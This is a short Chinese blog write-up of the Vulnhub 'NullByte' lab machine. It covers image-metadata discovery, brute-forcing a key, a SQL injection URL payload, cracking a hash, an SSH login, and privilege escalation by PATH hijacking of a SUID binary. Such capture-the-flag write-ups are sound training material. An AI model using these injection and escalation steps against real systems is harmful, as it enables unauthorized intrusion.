前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【Vulnhub】NullByte

【Vulnhub】NullByte

作者头像
yichen
发布2020-09-08 20:56:28
5360
发布2020-09-08 20:56:28
举报

nmap 扫描端口

访问首页有个 gif 图片,下载下来用 exiftool 看一下会发现有个 comment

访问一下 kzMb5nVYJw,要输 key,尝试用 burp 选了个 password 的字典爆破一下:elite

访问之后发现:

输入 " 报错

然后...

一年没有手工注入了,还有点怀念

http://192.168.149.195/kzMb5nVYJw/420search.php?usrtosearch="union select 1,2,3%23

你以为我接下来要手注?不,我已经忘了那些单词咋拼了Orz...

先 base64 解码一遍,然后 md5 解出来是 omega

扫目录发现

去访问一下 phpmyadmin,试了几个密码登不上

然后对着 777 端口去连接 ssh,连上了

find 找一下带有 S 权限的

find / -user root -perm -4000 -print 2>/dev/null

把那个 /var/www/backup/procwatch 给拷贝下来

echo '/bin/sh' > ps

chmod +x ps

PATH=/var/www/backup

./procwatch

然后就拿到了 root 权限,但是因为环境变量改了,所以没法直接用 ls,可以 /bin/ls

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-09-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 陈冠男的游戏人生 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档